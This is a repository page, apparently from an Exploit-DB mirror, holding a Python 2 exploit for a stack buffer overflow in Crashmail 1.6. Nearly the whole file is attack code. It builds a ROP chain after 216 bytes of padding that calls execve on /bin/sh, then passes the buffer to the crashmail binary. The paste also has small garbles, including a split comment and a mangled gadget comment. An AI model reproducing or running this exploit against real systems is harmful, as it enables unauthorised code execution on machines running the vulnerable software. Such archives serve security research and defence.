bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/44331.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

58 lines
No EOL
2.4 KiB
Python
Executable file
Raw Blame History

# Exploit author: Juan Sacco <jsacco@exploitpack.com>
# Website: http://exploitpack.com
#
# Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input.
# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
# Vendor homepage: http://ftnapps.sourceforge.net/crashmail.html
# Affected version: 1.6 ( Latest )
import os, subprocess
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # ./crashmail
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
# Control of EIP at 216
# ROP chain: execve ( binsh )
# Static-linked
junk = 'A'*216 # Fill
ropchain = rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += '//bi'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += 'n/sh'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9064)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000391a0) # 0x080811a0: xor eax, eax; ret;
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000001f9) # 0x080481f9: pop ebx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x000e0e80) # 0x08128e80: pop ecx; push cs; adc
al, 0x41; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x000705aa) # 0x080b85aaop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += p(0xfffffff5)
ropchain += rebase_0(0x00051dc7) # 0x08099dc7: neg eax; ret;
ropchain += rebase_0(0x00070e80) # 0x080b8e80: int 0x80; ret;
evil_buffer = junk + ropchain
print "[*] Exploit Pack http://exploitpack.com - Author: jsacco@exploitpack.com"
print "[*] Crashmail 1.6 - BoF ( ROP execve)"
print "[?] Payload can be read trough a file or STDIN"
try:
subprocess.call(["./crashmail","SETTINGS", evil_buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "[!] Crashmail not found"
else:
print "[*] Error executing exploit"
raise
Reference in a new issue View git blame Copy permalink